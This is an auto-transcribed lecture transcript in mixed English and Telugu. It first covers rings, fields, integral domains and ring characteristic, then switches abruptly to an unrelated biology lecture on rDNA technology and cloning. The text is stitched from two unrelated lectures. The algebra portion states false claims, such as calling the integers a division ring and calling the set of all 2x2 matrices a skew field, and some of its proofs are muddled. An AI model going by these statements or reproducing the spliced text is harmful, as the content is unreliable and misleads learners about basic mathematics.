but whereas in the ring of integers it is not a division ring. Why? Because the element 2, this is 2 is a non-zero element, this 2 has no multiplicative inverse in Z. So, therefore, this Z is only a division ring. Next, field. If all the elements in the ring forms a commutative group with respect to multiplication. Okay. So, the difference already we know that the division ring is only just a group with respect to multiplication. That means, R is a R comma dot is a semi group, 1 belongs to R, each non-zero element has the multiplicative inverse. So, these properties are forms consider then R is a group with respect to multiplication. Suppose if you adding the one more property, that is commutative,
with respect to multiplication, then R is a commutative group with respect to multiplication. Already R is a commutative group with respect to addition. Suppose if you consider these properties, then R is a commutative group with respect to multiplication, and already distributive laws are also hold. Therefore, R is a field. That means, if any field, if you consider any field, that field must be a commutative group with respect to the both binary operation. While we saying the commutative group with respect to the second binary operation, that is multiplication, that is, if you particularly say that all non-zero element forms the multiplicative group. So, all the non-zero elements in a ring forms a commutative group with respect to multiplication, then R is said to be a field. So, a field has is a commutative division ring. Generally, field is denoted by the letter F. Next, Q, R, C, these all are the examples of field. Next, M2. M2 is the set of all matrices. So, this is only a skew field, but not a field, because the field property contains commutative, and in general matrix multiplication is not commutative. Therefore, M2 is only a skew field, but not a field. So, dear students, first of all you just watch the difference between the integral domain, division ring and field. So, in the integral domain, R comma plus comma dot is a ring, skew field is also R comma plus comma dot is a ring, field is also a ring. So, here it is a commutative property, satisfies the commutative property with respect to multiplication, but the division ring does not that not having the commutative property with respect to multiplication, but whereas in the field the commutative property occurs. So, remaining the there is identity element with respect to multiplication also exists for these three, but in the integral domain it has no zero divisors, but in the division ring and field these two both having every non-zero element in it are having the multiplicative inverse. Okay. Now, we will introduce some theorems on integral domain. First of all, we prove that every field is an integral domain. So, before proving this, first of all we classify the differences between the field and integral domain. What is field? F is a commutative ring and integral domain is also a commutative ring. One belongs to F, that means the field is contain the multiplicative identity. Integral domain also having the multiplicative identity, but in the field every non-zero element in F has the multiplicative inverse, but whereas in the field integral domain it has no zero divisors. That is, the only difference between the field and integral domain is the set has no zero divisors. So, while we proving that every field is an integral domain, it is enough to show that that field has no zero divisors. Okay, dear students, already we know that. What about the without zero divisors? Without zero divisors condition can be stated in the two forms, namely A not equal to 0, B not equal to 0, that implies A, B is also not equal to 0. This is the one condition for ring without zero divisors. And the another one is
if we consider AB is equal to 0, that implies either A equal to 0 or B is equal to 0. So, this condition states for the ring without 0 divisors. Now, I shall prove that field has no 0 divisors for the proving of every field is an integral domain. So, for that, suppose I can consider A not equal to 0, this element belongs to F, and B is also an element of F. Already F is a field. So, according to the definition of field, every non-zero element in the field has multiplicative inverse. That means, A inverse is also exist in F, such that A into A inverse is equal to A inverse into A is equal to the identity element 1. So, suppose if you consider AB is equal to 0, and I will multiply A inverse on the pre side of this equation, that is A inverse into AB is equal to A inverse into 0. So, by using the associative property A inverse A into B is equal to 0, that is A inverse into A is equal to 1. So, therefore, 1 into B is equal to 0, that means B is equal to 0. So, you consider AB is equal to 0, that means B is equal to 0. Again, suppose if B is not equal to 0, this element belongs to F and A is some any other element in F. So, here B is a non-zero element. We know that every non-zero element in F has a multiplicative inverse. Similarly, B inverse is also exist in F such that B inverse into B is equal to B into B inverse is equal to 1. Suppose if you having that is if you consider AB is equal to 0, so that is B inverse multiply on the right side of this equation, that is AB into B inverse is equal to 0 into B inverse. So, that is by using the associative property A into B inverse is equal to 0, that is A into 1 is equal to 0, that implies A equal to 0. Okay. So, dear students, please watch, I can consider AB is equal to 0. According to this relation, either A is equal to 0 or B is equal to 0. So, from this relation I can say that this field has no 0 divisors. Already we know that every field is a commutative ring and every field has unity element. From this relation there is a field has no 0 divisor. So, commutative ring, unity element and it has no 0 divisors, these all are the 3 properties of integral domain. Therefore, F there is every field is an integral domain. Okay. Next example, the ring of integers, that is z comma plus comma dot, is an integral domain, but not a field. So, here we prove that every field is an integral domain, but the converse, that is every integral domain need not be a field. For proving this condition, that is every integral domain need not be a field, is I can take one example, the ring of integers z comma plus comma dot. So, this is only an integral domain, it is not a field, because the non-zero element 2 having no multiplicative inverse in Z. Okay. Next, coming to the one more important theorem, that is every finite integral domain is a field. So, suppose I can consider the D an integral domain. So, integral domain means it is a commutative ring, it is unity and it has no 0 divisor. For the sake of that condition, I can take the elements 0. 0 is the identity element with respect to addition and it has unity, that is 1, and some non-zero elements x1, x2 and so on xn. Okay, here these are n elements, this is 1, this is 2, totally this is n plus 2 elements, this D contains n plus 2 elements. So, these all are
distinct elements. That means here x1 is not equal to x2 and x2 is not equal to x3 and so on. So, that means all elements are distinct elements. So, now I will prove that this integral domain is a field. Okay. For proving this, I can classify the difference between the integral domain and field. So, integral domain means it is a commutative ring. So, field has also the commutative ring. It has unity element. So, field has also the same property. But the third one is it has integral domain has no zero divisors, but the field has every non-zero element is every non-zero element in D has the multiplicative inverse. So, now I will show that this integral domain in integral domain every non-zero element has multiplicative inverse, then this integral domain becomes a field. Okay. For that I can consider some non-zero element in capital D. Okay. So, here x is an element in D and 0 is also an element in D. By using the closure property x into 0, that is 0 belongs to D. Next, same x belongs to D and I can consider 1 belongs to D, that implies x into 1. So, this is also an element of D. Next, similarly x belongs to D and x1 belongs to D, that implies x into x1 belongs to D. So, by applying the same condition for all the elements in D, I got that is x last element is x xn belongs to D. Okay. So, by the closure property x into 0, x into 1, x into x1 and so on, these all are the elements in D. Okay. So, and moreover these all elements are distinct elements. Why? Because suppose if I consider there is any two elements of these are equal, what will be happen? That is x xi is equal to x xj for I not equal to j. So, that implies x xi minus x xj is equal to 0. That implies I can take the x as common, that is x into xi minus xj is equal to 0. Okay. So, dear students, please note the this type of relation. This is nothing but a into b is equal to 0. So, this is a into b is equal to 0 means the already D is an integral domain. So, integral domain means it has no zero divisors. Then what is the property for no zero divisors condition? Suppose if you consider a b is equal to 0, that implies either a is equal to 0 or b is equal to 0. So, this is of the form a b is equal to 0. That means, if you have either a x equal to 0 or xi minus xj is also are equal to 0. But you take x is a non-zero element in 0, sorry, x is a non-zero element in D. So, this is non-zero. So, therefore, the only chance is xi minus xj is equal to 0. So, according to this xi is equal to xj. That means, so in this group, in this elements there are some repetition, that is not possible because D contains n plus 2 different elements. Suppose if you can take this relation, then there is some equal elements are there. So, this is not possible, hence this is also not possible. Okay. So, therefore, these all are, that means x x1 x 1 to 1 x x1 x xn, that is these all are different elements in D. Okay. But originally D is a finite set. So, D is a finite set, therefore, already we know that D contains only these type of elements. So, here we contain again some additional elements, namely x x1 x into 1 x x1 x x2 and so on. So, suppose here n plus 2 elements are there. Suppose these elements are also in the D. Therefore, suppose if these two elements are different, that means these two elements are different, already here n plus 2 elements, here n plus 1 elements. So, total elements are
2n plus 3 elements. Okay. But so the D contains only n plus 2 elements. That is why the only chance is these elements and these elements must be the same in some different order. So therefore, suppose if you consider x into 1 is equal to some 1. So therefore, x is equal to 1. And suppose if you consider xi is equal to some 1, and that means these element, for example, in this element in this way you get suppose xi is there in the way. So therefore, suppose if you xi is equal to suppose some 1, that means this is of the form ab is equal to 1. So this ab is equal to 1 says b is the inverse of a, that is b is the inverse of a. That means according to the definition of existence of inverse, so xi is equal to 1 means xi is the inverse of x. Okay. So xi is the inverse of x. Already x is a non-zero element. So by the argument of this, so every non-zero element x has the multiplicative inverse in D. Okay. So therefore, the integral domain, every non-zero element in integral domain has the multiplicative inverse. That means that integral domain forms a field. Okay. Next, coming to the definition, nilpotent element. Nilpotent element means, suppose let r comma plus comma dot be a ring and a is some non-zero element. In case if there exists some natural number n such that a power n is equal to 0, that is this 0 is the identity element with respect to the addition, then the non-zero element a is said to be nilpotent element in R. Suppose you consider the example Z8. Z8 is the residues of addition residues modulo 8. So in this set 2 and 4 are the nilpotent elements, because 2 cube is 2 into 2 into 2, that is 8. 8 can be divided with 8, therefore the remainder is 0. Similarly 4 square is also 0, therefore 2 and 4 are the nilpotent elements in Z8. But there is no nilpotent element in Z6 with respect to addition modulo 6 and multiplication modulo 6. Idempotent element. So idempotent element is a square is equal to a. While we consider the nilpotent element a power n is equal to 0, but in the idempotent a square equal to a. But in the integral domain we have only two idempotent elements, one is 0 and another one is 1. Now we will discuss the characteristic of an integral domain. First of all, we will discuss the definition for the characteristic of a ring. Suppose if r comma plus comma dot is a ring, and if you can take any some least positive integer p such that p a is equal to 0 for all a belongs to R. That means for every element in R, you must add that element p times, the resultant is 0. Then such least positive integer p is said to be the ring of the characteristic of the ring. Suppose if you have no such positive integer,
That means if you add any element up to p times or q times, whatever it may be, so if, up to infinite times you don't get any 0, then that the characteristic of that ring is 0. So, for example, R equal to set of 0, 1, 2, 3, 4, 5, 6. This is a ring with respect to addition modulo 7 and multiplication modulo 7. So, in this example, suppose Z7 is equal to 0, 1, 2, 3, 4, 5, 6. So, this is a ring with respect to the addition modulo 7 and multiplication modulo 7. Suppose if you can take 0, of course 0 is the directly 0, so there is no problem for 0. Next coming to the 1, so 1 can be added up to 7 times. 7 times. So, 7 times means you get only 7. 7 is divided by 7. Therefore, the remainder is 0. That means 7 into 1 is equal to 0. Similarly, 7 into 2, that is 2 is added up to 7 times. Therefore, the value is 14. 14 is divided by 7. Therefore, the remainder is 0. Similarly, 7 into 3 is also 0. 7 into 4 is also 0. 7 into 5 is also 0. 7 into 6 is also 0. So, that means 7 into A is equal to 0 for all A belongs to R. Suppose in case if here, suppose if you can consider the one time. So, suppose 1 into 2 is not equal to 0, and suppose 3 into 2 is also not equal to 0, 4 into 2 is also not equal to 0, 5 into 2 is also not equal to 0, 6 into 2 is also not equal to 0. So, అంటే దట్ మీన్స్ ఇక్కడ మనం ఏం చెప్పదలుచుకున్నామంటే ఏని 7 టైమ్స్ యాడ్ చేస్తేనే 0 అవుతుంది, అంతకంటే తక్కువ సార్లు మల్టిప్లై దట్ ఇస్ యాడ్ చేస్తే మీకు 0 వచ్చే ఛాన్స్ లేదు. సో హియర్ దట్ మీన్స్ A 7A is congruent to 0 mod 7 for all A belongs to R. So, that is 7A is equal to 0 for all A belongs to R. So, here P is the less than the 7, that means P is the least value of 7. So, there is if there is no chance P into 1 is equal to sorry, here the only chance is P into 1 equal to P, that is not equal to 0. So, the 7 is the only least value. You can that is ఇప్పుడు మీరు మల్టిప్లై చేయదలుచుకుంటే 14 టైమ్స్ 2ని యాడ్ చేసినా కూడా 0 అవుతుంది, 14 టైమ్స్ 3ని యాడ్ చేసినా కూడా 0 అవుతుంది. బట్ 7 టైమ్స్ 14 టైమ్స్ 21 టైమ్స్ ఇలా మీరు తీసుకున్నప్పుడు ఈ 7, 14, 21లో లీస్ట్ ఏంటంటే 7. కాబట్టి 7 ఈస్ ది క్యారెక్టరిస్టిక్ ఆఫ్ ది రింగ్. Next, the ring of integers. So, the ring of integers has the characteristic 0 because suppose if మీరు z తీసుకున్నారు అనుకోండి రింగ్ ఆఫ్ ఇంటీజర్స్, దీంట్లో మీరు ఫర్ ఎగ్జాంపుల్ 1 తీసుకున్నారు, 1ని మీరు ఎన్నిసార్లు యాడ్ చేసినా కూడా మీకు 0 వచ్చే ఛాన్స్ లేదు. కాబట్టి ద క్యారెక్టరిస్టిక్ ఆఫ్ ఇంటీజర్స్ z ఈజ్ 0. దట్ మీన్స్ ద క్యారెక్టరిస్టిక్ ఆఫ్ ద రింగ్ z with respect to addition multiplication is 0 because for every A belongs to Z there exists no positive integer n such that NA is equal to 0. Next, some important point is the characteristic of an integral domain r comma plus comma dot is 0 or a positive integer according as the order of any non-zero element of R regarded as a member of the additive group R. So, this is the condition for that. Suppose r comma plus comma dot is a ring. So, what is the definition of ring? So, ring చెప్పాలంటే ఫస్ట్ ఆఫ్ ఆల్ ఇది అడిషన్తో కామ్యుటేటివ్ గ్రూప్ అయి ఉండాలి. సపోజ్ నేను రింగ్లో ఏదైనా ఒక ఎలిమెంట్ తీసుకుంటే అది ఆటోమేటిక్గా ఎక్కడ ఉంటుంది, ఆర్ కామా ప్లస్ అనే కామ్యుటేటివ్ గ్రూప్లో కూడా ఉంటుంది. సో, ఇది ఆర్ కామా ప్లస్ అనే కామ్యుటేటివ్ గ్రూప్లో ఏ అనే ఎలిమెంట్ ఎగ్జిస్ట్ అయింది కాబట్టి
ఈ కాముటేటివ్ గ్రూప్లో ఏ అనే ఎలిమెంట్ యొక్క ఆర్డర్ ఎంతైతే ఉంటుందో దట్ ఆర్డర్ either 0 or finite, whatever it may be, 0 or finite. సో మీరు ఏదైనా రింగ్లో ఒక ఎలిమెంట్ తీసుకుంటే అది ఆటోమేటిక్గా కాముటేటివ్ గ్రూప్లో కూడా ఉంటుంది కాబట్టి సో ఈ కాముటేటివ్ గ్రూప్లో ఆ నాన్ జీరో ఎలిమెంట్కి ఆర్డర్ ఏదైతే డిఫైన్ చేయబడుతుందో దట్ ఆర్డర్ ఈజ్ ద క్యారెక్టరిస్టిక్ ఆఫ్ ది రింగ్. నెక్స్ట్, దిస్ ఇస్ అన్ ఇంపార్టెంట్ థీరమ్. ద క్యారెక్టరిస్టిక్ ఆఫ్ అన్ ఇంటెగ్రల్ డొమైన్ ఈజ్ ఎయిదర్ ప్రైమ్ ఆర్ జీరో. ఓకే, let r comma plus comma dot be an integral domain and let a is any non-zero element. So a is a non-zero element అని చెప్తున్నాను కాబట్టి ఇది ఎక్కడ వస్తుంది, కాముటేటివ్ గ్రూప్లో కూడా వస్తుంది. హియర్ దేర్ ఆర్ టూ కండిషన్స్. వన్ ఈజ్ ఆర్డర్ ఆఫ్ a is equal to 0 or ఆర్డర్ ఆఫ్ a is equal to finite. There are two chances. Suppose if you consider ఆర్డర్ ఆఫ్ a is equal to 0, ఆల్రెడీ నేను చెప్పున్నానండి, సపోజ్ ఒక నాన్ జీరో ఎలిమెంట్కి అడిటివ్ గ్రూప్లో ఏదైతే ఆర్డర్ ఉంటుందో అదే ఆర్డర్ ఆ రింగ్ యొక్క క్యారెక్టరిస్టిక్ అవుతుంది. కాబట్టి సపోజ్ ఇఫ్ మీరు ఏ యొక్క ఆర్డర్ 0 అని తీసుకుంటే దెన్ ఆటోమేటికలీ ద క్యారెక్టరిస్టిక్ ఆఫ్ ఆర్ ఇస్ ఈక్వల్ టు 0. సపోజ్ ఆర్డర్ ఆఫ్ ఏ ఇస్ ఈక్వల్ టు ఫైనైట్ అనుకున్నాను అంటే ఫర్ ఎగ్జాంపుల్ పి. సో ఇప్పుడు నేనేం చేయాలంటే ఈ పి అనేది ప్రైమ్ అని ప్రూవ్ చేయాలి. పి అనేది ప్రైమ్ అని ప్రూవ్ చేయాలి. సో ఫర్ ది సేక్ ఆఫ్ దర్ ఇస్ ఐ విల్ ప్రూవ్ దిస్ వన్ యాజ్ కాంట్రడిక్షన్. లైక్ సపోజ్ పి ఈస్ నాట్ ఏ ప్రైమ్. పి ఈస్ నాట్ ఏ ప్రైమ్. సో ప్రైమ్ కాదంటే అది ఎలా ఉండాలి, దట్ నెంబర్ కెన్ బి ఎక్స్ప్రెస్డ్ యాజ్ ద ఫ్యాక్టర్ ఆఫ్ టూ నెంబర్స్, దట్ ఈస్ p is equal to p1 into p2, where p1 p2 are any numbers between 1 and p. p1 p2 కూడా రెండు 1 p మధ్యలో ఉంటుంది. సపోజ్ ఇక్కడ ఫర్ ఎగ్జాంపుల్ a b అనేటటువంటి టూ ఎలిమెంట్స్ ఆర్లో కన్సిడర్ చేస్తాను. By using closure property, a b is also an element of R. I know that the characteristic of capital R is equal to p. So the definition of characteristic of capital R అంటే ఏంటి, capital R లో ఉండే ప్రతి ఎలిమెంట్ని మనం p టైమ్స్ యాడ్ చేస్తే 0 వస్తుంది అని. సో ab అనే ఎలిమెంట్ కూడా capital R లో ఉంది కాబట్టి ab అనే ఎలిమెంట్ని కూడా నేను p టైమ్స్ యాడ్ చేస్తే 0 రావాలి. దట్ ఈస్ PAB is equal to 0. Okay, so this is one condition. పక్కన పెడదాం. నెక్స్ట్ P1 అనేది ఎలా ఉంది, P కంటే తక్కువ ఉంది. నెక్స్ట్ ఏ అనే ఎలిమెంట్ ఆర్లో ఉంది, ఏ అనే ఎలిమెంట్ ఆర్లో ఉంది. P1 అనే వాల్యూ దట్ ఈస్ P కంటే చిన్నది కాబట్టి, స్మాలర్ దెన్ P కాబట్టి ఇక్కడ అకార్డింగ్ టు ది కండిషన్ ఆఫ్ క్యారెక్టరిస్టిక్ P1A is not equal to 0 కావాలి. సో క్యారెక్టరిస్టిక్ అంటే ఎట్లా ఉండాలి, క్యాపిటల్ ఆర్లో ఉండే ప్రతి ఎలిమెంట్ని p టైమ్స్ యాడ్ చేస్తేనే 0 రావాలి, అంతకంటే తక్కువ సార్లు యాడ్ చేస్తే 0 వచ్చే ఛాన్స్ లేదు. కాబట్టి ఏని నేను p1 టైమ్స్ యాడ్ చేస్తే 0 వచ్చే ఛాన్స్ లేదు, కాబట్టి P1A is not equal to 0. సిమిలర్లీ b belongs to R and p2 some element. So p2 is the smaller than p, therefore p2b is also non-zero. సో ఇక్కడ b అనేటటువంటి ఎలిమెంట్ p టైమ్స్ యాడ్ చేస్తే 0 అవుతుంది, కానీ p కంటే తక్కువ సార్లు యాడ్ చేస్తే 0 వచ్చే ఛాన్స్ లేదు, కాబట్టి p2b is not equal to 0. సో హియర్ p1a is not equal to 0 and p2b is also not equal to 0. But P1A into P2B is also not equal to 0. Why? Because here I consider an integral domain. In this integral domain, there are no zero divisors. So what is meant by zero divisors? The product of two non-zero elements is again a non-zero element.
So, this is a non-zero element and this is also a non-zero element. Therefore, the product of two non-zero elements is again a non-zero element. So, this can be written as P1 P2 into AB is equal to 0, sorry, not equal to 0. Then P1 P2 is P, this is PAB is not equal to 0. Here I got PAB is equal to 0. According to this, PAB is not equal to 0. So, these two are different contradicts. Why I get the contradiction? Because I assumed that P is not a prime. So, therefore, the only chance is P is a prime number. That means the characteristic of an integral domain is either 0 or a prime number. Okay. Next, the characteristic of a field is either prime or 0. So, ఇప్పుడు మనం ఏం ప్రూవ్ చేస్తాం, క్యారెక్టరిస్టిక్ ఆఫ్ అన్ ఇంటెగ్రల్ డొమైన్ ఈస్ ఎయిదర్ 0 ఆర్ ప్రైమ్ అని చెప్పాం. ఇప్పుడు ఏం చెప్పాలి, ద క్యారెక్టరిస్టిక్ ఆఫ్ ఎ ఫీల్డ్ ఈస్ ఎయిదర్ 0 ఆర్ ప్రైమ్. వీ నో దట్ every field is an integral domain. So, therefore, the same proof may be applicable for this theorem also. Next, some problem. Let R be the ring A square equal to A for all A belongs to R, then show that the characteristic of capital R is 2, or the Boolean ring characteristic is 2. So, Boolean ring means A square equal to A for all A belongs to R. So, now I will show that the characteristic of a Boolean ring is 2. So, A plus A is also an element of R by using the closure property with respect to addition. So, R is a Boolean ring, therefore, every element is in the form of A square equal to A. Therefore, A plus A whole square is also A plus A. So, this A plus A whole square can be written as A plus A into A plus A, that is equal to A plus A. So, I will multiply A into A square plus A square plus A square plus A square is equal to A plus A. So, I know that A square equal to A plus this is A plus this is A plus A equal to A plus A. So, this is can be written as this form, because 0 is the additive identity. So, therefore, no problem for adding this 0. I will using the left cancellation law with respect to addition. So, therefore, I got 2A is equal to 0. So, A is any element that A can be added 2 times, that value is 0. So, 2A is equal to 0 and 1A means A, that already I can take it as A not equal to 0. So, 1A is not equal to 0. So, therefore, the least positive integer is 2 such that 2A is equal to 0. Hence, the characteristic of Boolean ring is 2. So, there is one more problem. If the characteristic of a ring is 2 and the elements A and B are of the ring commute, then prove that A plus B whole square equal to A square plus B square, or that equal to A minus B whole square. So, the characteristic of capital R is equal to 2. So, there are given one more condition is A and B are commute. A and B are commute means AB is equal to BA. So, now we will prove that A plus B whole square is equal to A square plus B square. So, for A plus B whole square means A plus B into A plus B. So, this can be written as A square plus AB plus BA plus B square. So, this is A square plus AB. BA can be written as AB plus this is AB plus B square. So, that is A square plus 2AB plus B square. So, we know that the characteristic of capital R is equal to 2. That means, every element added up to 2 times, that value is 0.
So, here A is an element, B is these two elements are R. So, by using closure property with respect to multiplication, AB is also an element of R. They are given that the characteristic of capital R is equal to 2. So, therefore, 2AB is equal to 0. So, that means this value becomes 0. So, therefore, you get A square plus B square. So, A plus B whole square equal to A square plus B square. So, this similar proof can also be obtained for A minus B whole square also. So, this is also A minus B into A minus B, that is A square minus AB minus BA plus B square. So, this BA can be written as AB minus plus B square. This AB is 2AB plus B square. So, 2AB value is 0, therefore, you get again A square plus B square. So, in this A plus B whole square and A minus B whole square is equal to A square plus B square. Okay. So, dear students, in this class we will learn what is meant by integral domain, what is the division ring or skew field, what is the field, and some important theorems on integral domain. Good morning, students. Myself, I am Dr. Srinivas from Silver Jubilee Government College, Kurnool. Today, I would like to explain about the rDNA technology, which is very important for the students of biology, and where there are subtopics called as adapters and linkers, gene transfer methods, and PCR. So, coming to the aspect of biotechnology, it's a key subject where all the research is going on. And this is a science where we will use the living organisms to produce the valuable products of which are useful for the human welfare. So, using the technology and the knowledge of cells to modify their activities in order to make living organisms more effective for serving the people. That is the main theme of the biotechnology. We know that there is a technology driven era is going on, where the technology is applied in the field of biotechnology in the form of a biology, I can say. So, why we are using the technology in the biology? Why we need this? As if the population is growing on, there is a high increasing in the population over the period of 30 to 40 years, and new issues are coming on, and there is a scarcity in the food, scarcity in the living environment, and there is a high requirements. So, in order to reach these requirements, we need to have to develop some new technological processes, I can say, by using the living organisms. So, if we can go back, the old process so called as the telegraph, later on it was converted or it was evolved to a phone, land phones, then to mobile, then to pager, now the smartphones, and future will be the virtual. So, look at the change or transformation is going on in the technology in all the fields. Obviously, in biology also the technology is growing rapidly, and that technology should be useful for the humankind and for the human welfare. So, look at this funny picture. This was depicted by some of the animator, where he jointed a scorpion with a snake and a shark fish with a cat. Looking to be funny, but it has a lot of meaning. He had an idea that there might be a chance in future that
the snake may be combined or snake may be cloned with a scorpion, that might be termed as a hybrid. And cat may have a big teeth which are very, very aggressive teeth, I can say, which can be combined with a shark. So, these sort of animals can be termed as a hybrids, and the usage of technology is called as a cloning, and the inherent or inert or internal technology which leads to rDNA technology. So, what it means by a gene? We all know that a gene is a segment of a DNA which codes for an RNA or a polypeptide. So, a clone is a group of organisms or cells or molecules arising from a single individual. So, we are going to have a target DNA, a specified DNA which you require, which we require, and you are going to clone it into number of species or number of I can say copies. So, that is called as a gene cloning. So, gene cloning is a wider spectrum in the present biotechnology, where it has different steps. I can say it is the usage of gene technology or gene cloning, it varies from species to species, but the gene cloning has a specific process which involves an rDNA technology, where you have to follow the following steps, which are shown as: you need to select the DNA, you need to join the DNA with the vector, you need to introduce the vector into a specific host, then you need to amplify the host or the bacteria, and you need to select the transformants which you require. They are the basic steps of rDNA technology, which is a part of gene cloning. So, coming to the part of cloning, it is a process of producing multiple copies of a similar type. You might have seen a recent movie called as a Robo, where you will find a similar sort of robots with no difference. So, clone is derived from a word called as a twig, and in molecular biology we are using this cloning in different fields. The one is called molecular cloning or molecule cloning, where you will extract the monoclonal antibodies and the multiplication of DNA. In cell cloning, you will culture the bacterium and culture of animal cells, where you will find in stem cells, which is a booming field, and organism cloning, where you will find in animal cloning as well as in the micro propagation. So, this cloning is a technique which is widely used in animals as well as the plants, in prokaryotes as well as in the eukaryotes. In the plants, by the cloning, recently it was a big, I can say, drift that we have produced a Bt cotton, which is a high resistant cotton, and that cotton has a transgenic, I can say it is a transgenic plant, and it had a resistant power over the many what I can say, the insects. So, the second thing, many pictures have shown the second slide, second picture, so called as a golden rice. So, comparing with the normal rice, the golden rice has a special characters, that it has a beta carotene, and it has a high I can say vitamin A. So, that sort of a rice being produced by the gene cloning technique, and this is one of the technology which will be used in plants. So, recently the gene to cloning technology is widely used in the plants. So, coming to the animals. So, in animals, a wide range of cloning is going on, and I have given three important aspects of cloning in animals. One is the reproductive cloning, second one is the gene cloning, third one is the therapeutic cloning. So, you are all aware that recently we are having a problem with the recent couples where there is a lack of child because of some sort of problems. So, that can be cured or that can be managed with the reproductive cloning. In reproductive cloning, there are two basic categories called as embryo splitting and nuclear transfer. And the coming to the other one, that is called as gene cloning, the production of multiple copies, where we already read in the previous slides, and it is very useful in genetic engineering. And the third most important aspect of the cloning is called therapeutic cloning, which is widely used in all the research institutes, where the major aspect in the therapeutic cloning is one of the example is the cancer. The cure of cancer or the minimization of the cancer cells can be happened through this
therapeutic cloning. So, creation of new tissues and organs from single cells. This does not create any genetically identical individuals, but helpful in the humankind for curing the diseases. So, the methodology which involves in the reproductive cloning is one, the enucleation of egg. You are all aware that we need to take out the nucleus from the egg. Then there is an introduction or induction of the particular cells, then nuclear transfer, activation of egg, then embryo transfer to the mother, and pregnancy confirmation and checking for genetic identity. This is a general process, I can say, which will be seen in the reproductive cloning. So, as you have seen this picture, this is the first cloned frog being developed by Briggs and King, and this is one of the drift, I can say, in the biotechnology when it comes to the cloning. So, this cloned aspect was clearly given by these two eminent scientists, and this has proved that as cloning can be happened in eukaryotes, because so far from the 1970s the cloning was seen only in the prokaryotes, especially in the E. coli bacteria, and there is a transformation that the cloning can happen in the eukaryotes, and the example you will see in the screen that there is a northern leopard frog. And most of the students are aware of this beautiful topic called as dolly. Dolly is one of the topic in cloning where we will study this dolly since the previous classes, like from our childhood. So, this was a story which links to animal biotechnology. So, the dolly was originated in July 5th and it died on February 14, 2003, and at an age of 7 years. So, dolly had proved that as cloning can happen in the animals, and through the cloning we can generate a new sort of animals without any reproduction. And it has raised a number of important issues that some problems which are seen in the cloning can be I can say they can be modified in future. So, this is a process that created in the creation of dolly, that the enucleated cell and fusion of that particular nucleus with an egg and culturing and putting into a uterus or womb of a female for developing a lamb. So, this slide depicts a total strategy or the total mammalian cloning that was happened so far, wherein from 1984 to 2002 or 2003, lot of aspects has been come, like the production of lambs, production of calves, and production of new type of sheep and transgenic sheep, and the production of mice, rat, as well as the small middle picture which is called as a tetra. This is a female rhesus monkey named as a tetra, was cloned by splitting early embryos, which was developed in 1999, and in 2000 through the cloning the pigs were developed, or pigs was cloned, I can say, and the cloning also helped in the development of rabbits in 2002. And these are some of the examples in the cloning that the production of or the new baby from the test tube baby, and there are certain examples which come along the way of mammalian cloning. And this is one of the finest example after the dolly, that is called as a poly, and this was developed by Wilmot, and this is a basic example where the human gene was inserted into the sheep. That is the finest example you will see after the dolly. And this particular picture shows the cloning process in the different animals, the production of the first cloned rat called as a Ralph, and production of CC cats, it is called as a copycat, which generally used in the word will be used the word generally used in cartoons, copycats, and these pet animals are also being developed through the process of cloning. So, this is another aspect of the cloning where the cloning helps in therapeutic way, I can say. In therapeutic way, the diseased human being taken, and the important cells that are not infected will be taken out, and they will be cultured,
and they will be transformed again to that human for curing the diseases. Through this therapeutic cloning, we will yield many type of cells which can be useful in this process of curing the diseases. And this is one of the example that has been given as a first clinical trial on basis of the therapeutic usage, I can say. So, hope this slide is not clear to you, but this slide has an importance that through this cloning or through this DNA technology, recombinant DNA technology, which is being used in the cloning, there are might more examples that have been evolved, like the production of anticoagulates, production of blood factors, colony stimulating factors, erythropoietin, which is a main substance in the RBC, and the growth factors, the human insulin. Generally, we use this example in the RDNA technology often, and interferons and interleukins and monoclonal antibodies and superoxidase dismutase, which is very essential for this antioxidant, and the vaccines, different kinds of vaccines being developed through this RDNA technology. And what are the potentials of the cloning and what are the problems? So, this slide will depict a small example, like we can develop new organs or organisms, and we can replace a lost cell by producing in the mother's womb, and gene therapy is one of the best way for the cloning, and we can reverse the aging. This research is going on, but there are some problems that the overgrowth syndrome can be one of the problem, and genetic defects is also one of the problem in the cloning, and there might be a premature aging, which you have already seen in an example called as a dolly, and the insertion of genes can be controlled or cannot be controlled in the cloning process. So, this is a major aspect of the cloning where you will find the technology. So, this is called as a RDNA technology. This RDNA technology basically a technology where you will find or you will take a DNA which you require. Take an example of an insulin or growth hormone or the any product gene that you require as a final product. So, take the foreign DNA and insert that foreign DNA into a vector. The vectors may be of many kinds, and produce a new DNA called as a recombinant DNA, and that will be inserted into a host cell. Generally, the host cells are the bacteria, because they can be cultured in no time, and this bacteria will develop into a mass of culture, and from that culture or from that bacteria you will take the desired products. It may be of chemicals or hormones or enzymes or antibiotics or blood factors, whatever may be. So, there are two types of vectors in general you will find, or two types of vectors which will be seen in the biotechnology. One is called as the cloning vectors, which are useful for the cloning process, and the other one is called the expression vectors, which will be useful for the final production of some product. It might be a protein or an enzyme. So, the foreign DNA may be a genomic DNA, foreign DNA may be a cDNA or amplified DNA or synthetic DNA, which will be used in the process of the RDNA. So, hope this picture is not clear to you, but this picture will show that this is a bacteria where it does not have the foreign DNA or the insert the required DNA that you are going to culture, and you are taking a eukaryotic gene here and you are inserting into a plasmid and transforming into a bacteria. This is called as a transformation, and after the transformation you will culture this bacteria in a medium. It might be agar or whatever may be the medium. Then the cultured bacteria may be taken off, because you need to select that your DNA presence is important. You need to separate the bacteria that contains your recombinant DNA from the non-recombinant DNA. They are called as a transformants. So, after separating, you can separate your desired DNA or the required DNA, or you can find the product. So, this will come under the process of expression vectors. So, here if you can use this slide. So, these are the recombinant DNAs, might be useful for the pest resistant gene which will be inserted in future in the plants, or the genes which will be used as a bacteria cleaning the toxic waste, which will be oil spills, which will be generally seen in the oceans. And some products may be seen, or they will be extracted from the bacteria, which might be useful for dissolving the blood clots, which is a common problem in new generations, and the growth hormone, which is a lacking in some humans, and it can be treated by extracting from the bacteria.
